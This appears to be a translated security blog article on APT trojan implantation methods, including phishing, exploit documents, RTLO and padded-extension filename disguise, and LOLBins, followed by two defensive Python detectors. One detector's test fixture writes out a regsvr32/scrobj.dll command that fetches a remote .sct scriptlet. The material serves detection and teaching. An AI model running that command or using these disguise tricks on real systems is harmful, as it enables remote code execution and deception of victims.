[YA-10] APT Attack Trojan Series: Implantation Methods

2023.07.27 Guangdong

Web page trojan (drive-by) implantation

Implantation through a trojaned web page is the classic case. It usually relies on a browser or related vulnerability: the attacker builds a web page around real-time news or a hot topic, combines the exploit with that page, and publishes the resulting malicious page. When a user opens the page, the remote trojan is downloaded and installed automatically. Typical vulnerabilities include MS06014 and MS10003.

Email implantation (spear phishing)

The most common form of email implantation is an attachment: the trojan is dropped when the user opens it. The other form combines email with a malicious web page. Because email supports an HTML body, embedding the relevant vulnerability in that page achieves the same effect, and the trojan is implanted merely by selecting the message, without the attachment being opened (the message is sent in HTML format, posing for example as a job applicant).


Document bundling implantation (mostly spear phishing)

This is another effective method: the payload is bundled into a document through an Office or PDF document vulnerability. When the user opens the document the vulnerability fires, dropping the trojan or running shellcode that carries out the remote attack. Such documents are also commonly sent as email attachments.

Disguise and deception implantation

For example, the extension of an exe file can be manipulated: a 'doc' is inserted before the original 'exe', a long run of spaces is typed so that the 'exe' is pushed out of view, and the file is given a document-style icon. Another variant changes the suffix with a Unicode right-to-left override character that flips 'cod' so the name appears to end in 'doc'; icon disguise and similar tricks round out the category.
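The three disguises above (space-padded double extension, the U+202E 'cod' flip and the plain double extension) all leave traces in the stored filename that a mail gateway or endpoint scanner can check. The following is an added example, not code from the article: it reports the extension the operating system will actually act on, approximates the name the user sees, and flags the indicators. The sample filenames are constructed for the example.

```python
import re

# Bidirectional control characters that can make a displayed filename differ
# from the stored one (U+202E is the right-to-left override behind the
# "cod" flip described above).
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                   ".js", ".vbs", ".hta", ".lnk", ".chm"}
DOCUMENT_EXTS = {".doc", ".docx", ".pdf", ".xls", ".xlsx", ".ppt", ".pptx",
                 ".rtf", ".txt"}

# Constructed sample names (not taken from the article): the space-padded
# double extension, the U+202E flip, a plain double extension, a benign file.
SAMPLE_FILENAMES = [
    "resume.doc" + " " * 40 + ".exe",
    "invoice\u202ecod.exe",
    "report.pdf.exe",
    "quarterly_report.docx",
]


def real_extension(name: str) -> str:
    """The extension the operating system acts on: text after the last dot."""
    dot = name.rfind(".")
    return name[dot:].lower() if dot != -1 else ""


def apparent_name(name: str) -> str:
    """Approximate what a user sees: text after a U+202E override is rendered
    reversed until a U+202C pop (or the end of the name); other bidi controls
    are invisible and dropped."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202e":
            end = name.find("\u202c", i + 1)
            end = len(name) if end == -1 else end
            out.append(name[i + 1:end][::-1])
            i = end + 1
        elif ch in BIDI_CONTROLS:
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def analyze_filename(name: str) -> list[str]:
    """Return the disguise indicators found in a filename (empty if none)."""
    findings = []
    if any(ch in BIDI_CONTROLS for ch in name):
        findings.append("bidi-override")
    ext = real_extension(name)
    if ext in EXECUTABLE_EXTS:
        findings.append("executable:" + ext)
        # Eight or more whitespace characters right before the final extension:
        # the padding that pushes ".exe" out of the visible column.
        if re.search(r"\s{8,}\.[A-Za-z0-9]+$", name):
            findings.append("padded-extension")
        # A document extension hidden in the middle of the name ("report.pdf.exe").
        for segment in name.split(".")[1:-1]:
            if "." + segment.strip().lower() in DOCUMENT_EXTS:
                findings.append("double-extension")
                break
    return findings


def scan(names: list[str]) -> dict[str, list[str]]:
    """Map each suspicious filename (as the user would see it) to its indicators."""
    return {apparent_name(n): f for n in names if (f := analyze_filename(n))}


if __name__ == "__main__":
    for shown, findings in scan(SAMPLE_FILENAMES).items():
        print(f"{shown!r}: {', '.join(findings)}")
```

The check deliberately keys on the stored name rather than the rendered one: `invoice\u202ecod.exe` is shown to the user as `invoiceexe.doc`, but `real_extension` still returns `.exe`, which is what the shell will execute.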

Bundling implantation

EXE bundling, document embedding, multimedia files and e-book implantation. In the article '三十六.WinRAR漏洞复现(CVE-2018-20250)及恶意软件自启动劫持' (36. Reproducing the WinRAR vulnerability (CVE-2018-20250) and malware autostart hijacking), I explained in detail how files are bundled through WinRAR.

Remote command execution

The attacker implants the trojan on the target computer by way of remote command execution, using a remote control tool.

Social engineering

The attacker uses social engineering to implant the trojan on the victim's computer, tricking the user into clicking a malicious link, downloading an attachment or executing malicious code.

Other methods

For example, implantation via a particular USB drive (deliberately dropped, a work USB drive, a data copy and so on). APT attacks use many kinds of malicious decoys, including 'white plus black' (a legitimate signed executable that loads a malicious DLL), lnk files, doc documents and archives carrying the WinRAR ACE vulnerability (CVE-2018-20250); later attacks added executables disguised with a Word icon, chm files and so on. One example loads scrobj.dll and remotely calls http://45.xxx.xxx.67/window.sct, using a Microsoft system-file LOLBin to evade antivirus monitoring and achieve remote code execution.
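The scrobj.dll plus remote .sct chain in the last paragraph is visible in process-creation telemetry: the LOLBin's command line names the scriptlet DLL and a URL ending in .sct, and in the decoy scenarios above the parent is an Office application that opened the lure document. The following is an added example, not code from the article, that runs those three checks over constructed events. It assumes regsvr32.exe as the host binary for the scriptlet (the article only says "a Microsoft system-file LOLBin"); the .sct URL is the masked one quoted in the article.

```python
import re

# Constructed process-creation events (not telemetry from the article), with the
# fields an EDR or Sysmon event ID 1 record typically carries. Event 0 models
# the scrobj.dll + remote .sct chain; regsvr32.exe as host is an assumption.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://45.xxx.xxx.67/window.sct scrobj.dll",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll",
     "parent": r"C:\Windows\System32\msiexec.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c whoami",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe"},
]

# A URL on the command line that ends in .sct: a remotely fetched scriptlet.
REMOTE_SCT = re.compile(r"https?://\S+\.sct\b", re.IGNORECASE)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Signed system binaries that can run script or commands on behalf of a lure.
SCRIPT_HOSTS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "cmd.exe", "powershell.exe"}


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def classify_event(ev: dict) -> list[str]:
    """Return the detection reasons for one process-creation event."""
    reasons = []
    if "scrobj.dll" in ev["cmdline"].lower():
        reasons.append("scrobj.dll-scriptlet-host")
    if REMOTE_SCT.search(ev["cmdline"]):
        reasons.append("remote-sct-url")
    parent, image = basename(ev["parent"]), basename(ev["image"])
    # An Office document should not normally spawn a script host at all.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append("office-spawned-lolbin:" + parent)
    return reasons


def triage(events: list[dict]) -> list[tuple[int, str, list[str]]]:
    """Flagged events as (index, severity, reasons); two or more reasons is high."""
    hits = []
    for i, ev in enumerate(events):
        reasons = classify_event(ev)
        if reasons:
            hits.append((i, "high" if len(reasons) >= 2 else "medium", reasons))
    return hits


if __name__ == "__main__":
    for index, severity, reasons in triage(SAMPLE_EVENTS):
        print(f"event {index}: {severity} - {', '.join(reasons)}")
```

The benign regsvr32 run from an installer (event 1) produces no reasons, which is the point of combining the parent check with the command-line checks: regsvr32 itself is far too common to alert on alone, but regsvr32 referencing scrobj.dll with an http URL, launched by WINWORD.EXE, is the chain the article describes.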
